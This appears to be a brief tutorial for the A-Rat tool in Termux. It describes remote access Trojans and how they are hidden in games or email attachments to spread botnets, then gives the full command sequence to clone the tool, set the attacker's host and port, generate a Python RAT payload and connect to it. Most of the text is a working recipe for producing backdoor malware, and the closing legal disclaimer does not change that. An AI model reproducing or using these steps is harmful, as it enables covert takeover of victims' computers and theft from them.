A-Rat = Remote access tool we can generate python based rat. A remote access Trojan (RAT) is a malware program that includes a back door for administrative control over the target computer. RATs are usually downloaded invisibly with a user-requested program -- such as a game -- or sent as an email attachment. Once the host system is compromised, the intruder may use it to distribute RATs to other vulnerable computers and establish a botnet.
You need to install Lazymux in Your Termux and install A-Rat Tool LAZYMUX INSTALLATION
after installation of lazymux there are options in 22 number is avilable for A-RAt tool installation simply click the number 22 and install the A-Rat tool in termux.
$ apt update
$ apt upgrade
$ apt install git
$ apt install python2
$ apt install python
$ git clone https://github.com/RexTheGod/A-Rat
$ cd A-Rat
$ chmod +x *
$ python2 A-Rat.py
$ help
$ set host 127.0.0.1 [your ip]
$ set port 1337
$ set output /$HOME/rat.py
$ generate
It generates rat.py in termux home directory
Open termux new session
type
$ ls
here you get that rat.py
go to again A-Rat means privious session of termux
Type run to start exploit.
$ run
and then open new session and run rat like this
$ python rat.py
and come back to A-Rat session
Now its connected to that rat. means Hacked. press control + c to stop.
Usage of A-Rat for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.